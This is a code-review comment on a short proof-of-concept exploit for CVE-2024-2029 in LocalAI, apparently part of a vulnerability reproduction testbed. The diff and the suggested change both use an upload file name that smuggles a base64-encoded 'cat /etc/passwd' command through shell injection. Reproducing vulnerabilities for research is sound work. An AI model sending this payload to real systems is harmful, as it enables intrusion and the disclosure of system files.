localai/cve-2024-2029/poc.py

```diff
@@ -0,0 +1,11 @@
+import requests
+
+files = {
+    'file': ('a;$(echo Y2F0IC9ldGMvcGFzc3dkCg==|base64 -d);', open('simpleAudio.ogg','rb').read()),
```

Comment:
While triaging the testbed I was able to reproduce the vulnerability even without sending a body for this file; may you confirm this and, if positive, remove the file `simpleAudio.ogg` and apply this change?
```suggestion
    'file': ('a;$(echo Y2F0IC9ldGMvcGFzc3dkCg==|base64 -d);', ""),
```